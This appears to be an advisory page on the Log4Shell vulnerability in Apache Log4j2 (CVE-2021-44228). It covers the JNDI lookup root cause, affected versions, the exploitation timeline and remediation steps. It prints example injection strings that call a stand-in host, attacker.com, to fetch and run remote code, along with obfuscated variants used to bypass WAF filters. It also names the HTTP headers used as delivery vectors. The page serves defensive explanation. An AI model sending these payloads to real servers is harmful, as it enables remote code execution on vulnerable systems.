CVE-2021-44228

Apache Log4j2 'Log4Shell' — JNDI Injection via Logged Input Allows Unauthenticated Remote Code Execution
🔥 CVSS 3.1  10 / 10 — CRITICAL 🔴 CISA Known Exploited Vulnerability

Overview

Actively Exploited. This vulnerability has been added to CISA's Known Exploited Vulnerabilities (KEV) Catalog on December 10, 2021 with a remediation deadline of December 24, 2021. Federal agencies are required to apply mitigations per BOD 22-01.

CVE-2021-44228, nicknamed "Log4Shell," is a critical remote code execution vulnerability in Apache Log4j2, one of the most widely used Java logging libraries. When Log4j2 logs a string containing a crafted JNDI expression such as ${jndi:ldap://attacker.com/x}, it evaluates the expression and performs an outbound JNDI lookup — potentially loading and executing attacker-controlled Java code. Because Log4j2 is embedded in thousands of Java applications, middleware platforms, and cloud services, this single vulnerability exposed an enormous fraction of internet-connected infrastructure.

The vulnerability received a perfect CVSS score of 10.0 — unauthenticated, network-accessible, no user interaction, with full remote code execution. CISA Director Jen Easterly called it "the most serious vulnerability I have seen in my decades-long career." Exploitation began within hours of public disclosure and mass scanning was observed within 24 hours.

What Is Apache Log4j2?

Apache Log4j2 is the dominant Java logging framework, used by an estimated hundreds of millions of Java deployments worldwide. It is embedded as a dependency in Apache Struts, Apache Solr, Apache Druid, VMware products, Cisco products, Amazon Web Services, Microsoft Azure services, Apple iCloud infrastructure, Minecraft servers, and countless enterprise Java applications. Unlike application-level vulnerabilities that affect a single product, Log4Shell's reach extended to any Java software that used Log4j2 for logging — which, in practice, included most of the Java ecosystem.

Affected Versions

Log4j2 Version Status
2.0-beta9 – 2.14.1 Vulnerable (CVE-2021-44228)
2.15.0 Partial fix — bypassed by CVE-2021-45046
2.16.0 Fixes CVE-2021-45046; disables JNDI by default
2.17.0 Fixes CVE-2021-45105 (DoS)
2.17.1 / 2.12.4 / 2.3.2 Fixes CVE-2021-44832 (JDBC appender RCE)
2.17.1+ / 2.12.4+ / 2.3.2+ Recommended minimum

Log4j 1.x is end-of-life and separately vulnerable; it is not affected by Log4Shell specifically but should be replaced.

Technical Details

Root Cause: JNDI Lookup in Log Message Processing

Log4j2 supports message lookup substitutions — a feature that allows log messages to embed dynamic values using the ${prefix:name} syntax. For example, ${env:HOME} inserts the HOME environment variable into a log message. One supported lookup type is jndi: — the Java Naming and Directory Interface — which allows retrieval of objects from external directories including LDAP, RMI, DNS, and CORBA.

When Log4j2 logs any string containing ${jndi:ldap://attacker.com/x}, it:

  1. Recognizes the JNDI lookup expression.
  2. Performs an outbound LDAP request to attacker.com.
  3. The LDAP server returns a reference to a Java class at a remote URL.
  4. Log4j2 loads and instantiates that class — executing the attacker's code in the JVM process.

Because Log4j2 is used to log user-controlled input (HTTP headers, form fields, usernames, search queries), any such input can be weaponized as a delivery vector. The exploit string ${jndi:ldap://attacker.com/a} placed in a User-Agent, X-Forwarded-For, or other HTTP header reaches Log4j2 when the request is logged.

Why No Authentication or User Interaction Is Required

The attack requires only that:

  1. The server uses Log4j2 (or a library that uses Log4j2) for logging.
  2. Any user-controlled string reaches a log statement.
  3. The server can make outbound LDAP/DNS connections.

These conditions describe the default configuration of most Java web applications. No account, session, or user interaction is needed.

Obfuscation and Bypass Techniques

Defenders who deployed WAF rules blocking the literal string ${jndi:ldap:// were quickly bypassed. Log4j2's lookup syntax supports nested lookups and character transformations:

${${lower:j}ndi:${lower:l}dap://attacker.com/x}
${${::-j}${::-n}${::-d}${::-i}:...}
${j${::-n}di:ldap://...}

These variants, observed within 24 hours of disclosure, rendered simple string-matching mitigations ineffective.

Attack Characteristics

Attribute Detail
Attack Vector Network — any logged user-controlled string is a delivery vector
Privileges Required None — exploit string placed in an HTTP header is sufficient
User Interaction None
Outbound Connection Required Yes — server must reach attacker's LDAP/RMI server (mitigated by egress filtering)
Scope Changed Yes — exploitation of the JVM process can pivot to host OS

Discovery

Chen Zhaojun of Alibaba Cloud Security Team discovered and reported the vulnerability to the Apache Foundation on November 24, 2021. An unnamed individual published a proof-of-concept exploit on GitHub on December 9, 2021 — before the patch was released — triggering immediate mass exploitation. The GitHub PoC was quickly deleted, but the exploit had already spread. Apache released Log4j 2.15.0 on December 10, 2021, the same day CVE-2021-44228 was published.

Exploitation Context

  • Exploitation began within hours of public PoC release on December 9, 2021
  • Mass scanning observed within 24 hours; Cloudflare, Greynoise, and others documented millions of exploitation attempts
  • Affected organizations: Apple, Amazon AWS, Cisco, VMware, Twitter, Steam, Tesla, and thousands more confirmed vulnerable infrastructure
  • Threat actor adoption: Nation-state APT groups (Iranian, Chinese, North Korean, Turkish), ransomware operators (Conti, Khonsari), cryptomining botnets, and access brokers all adopted the exploit within days
  • Ransomware use: Confirmed (ransomwareUse: true) — multiple ransomware families deployed Log4Shell as initial access
  • Egress filtering as partial mitigation: Many production deployments limited damage because outbound LDAP connections were blocked by firewall rules — the exploit requires an outbound callback from the victim server
  • Estimated patch timeline: Over 93% of cloud environments were vulnerable at time of disclosure; full remediation across the ecosystem took months

Remediation

CISA BOD 22-01 Deadline: December 24, 2021. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Recommended Actions

  1. Upgrade Log4j2 to 2.17.1 (Java 8), 2.12.4 (Java 7), or 2.3.2 (Java 6) — these versions include all four CVE fixes from December 2021. Do not stop at 2.15.0 or 2.16.0; both have additional vulnerabilities.

  2. Inventory all Log4j2 usage — identify every application, library, and container that bundles Log4j2 as a direct or transitive dependency. Tools like log4j-detector, log4j2-scan, and syft can find Log4j2 JARs inside nested archives.

  3. Immediate mitigations while patching (for Log4j 2.10.0+):

    -Dlog4j2.formatMsgNoLookups=true

    Or set environment variable: LOG4J_FORMAT_MSG_NO_LOOKUPS=true. Note: this was bypassed in 2.15.0 — not a substitute for upgrading.

  4. Block outbound LDAP/RMI connections at the network perimeter. Many exploitation chains require the victim server to make an outbound callback; egress filtering to untrusted destinations limits the blast radius even on vulnerable hosts.

  5. Apply WAF rules as a detection layer (not a primary mitigation — easily bypassed), but monitor for exploitation attempts.

  6. Vendor software: Any third-party Java software that bundles Log4j2 must be updated via the vendor. Do not assume an OS-level patch covers embedded copies inside application JARs.

Key Details

PropertyValue
CVE ID CVE-2021-44228
Vendor / Product Apache — Log4j2
NVD Published2021-12-10
NVD Last Modified2026-02-20
CVSS 3.1 Score10
CVSS 3.1 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
SeverityCRITICAL
CWE CWE-20 — Improper Input Validation
CISA KEV Added2021-12-10
CISA KEV Deadline2021-12-24
Known Ransomware Use ⚠️ Yes

CVSS 3.1 Breakdown

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Required Action

CISA BOD 22-01 Deadline: 2021-12-24. For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.

Timeline

DateEvent
2021-11-24Chen Zhaojun of Alibaba Cloud Security Team reports vulnerability to Apache Foundation
2021-12-09PoC exploit published on GitHub (since deleted); mass exploitation begins within hours
2021-12-10Apache releases Log4j 2.15.0 with partial fix; CVE-2021-44228 published; CISA KEV added
2021-12-13CISA Emergency Directive ED 22-02 issued; Log4j 2.16.0 released (disables JNDI by default)
2021-12-14Bypass of 2.15.0 discovered (CVE-2021-45046)
2021-12-17Log4j 2.17.0 released (fixes DoS in 2.16.0, CVE-2021-45105)
2021-12-24CISA BOD 22-01 remediation deadline
2021-12-28Log4j 2.17.1 released (remote code execution fix for JDBC appender, CVE-2021-44832)

References

ResourceType
NVD — CVE-2021-44228 Vulnerability Database
CISA KEV Catalog Entry US Government
Apache Log4j Security Vulnerabilities — Official Advisory Vendor Advisory
Log4j2 Fix Commit — Disable JNDI by default Patch / Source Code
GitHub Security Advisory GHSA-jfh8-c2jp-hgv6 Security Research
LunaSec — Log4Shell Zero-Day Initial Analysis Security Research
Tenable: CVE-2021-44228 Log4Shell FAQ Security Research
BleepingComputer: Log4Shell Proof-of-Concept Exploit Security Research
CWE-20 — Improper Input Validation Weakness Classification

Last updated: 2026-05-01

Gavin Hollinger & AI assembled this air-gap friendly HTML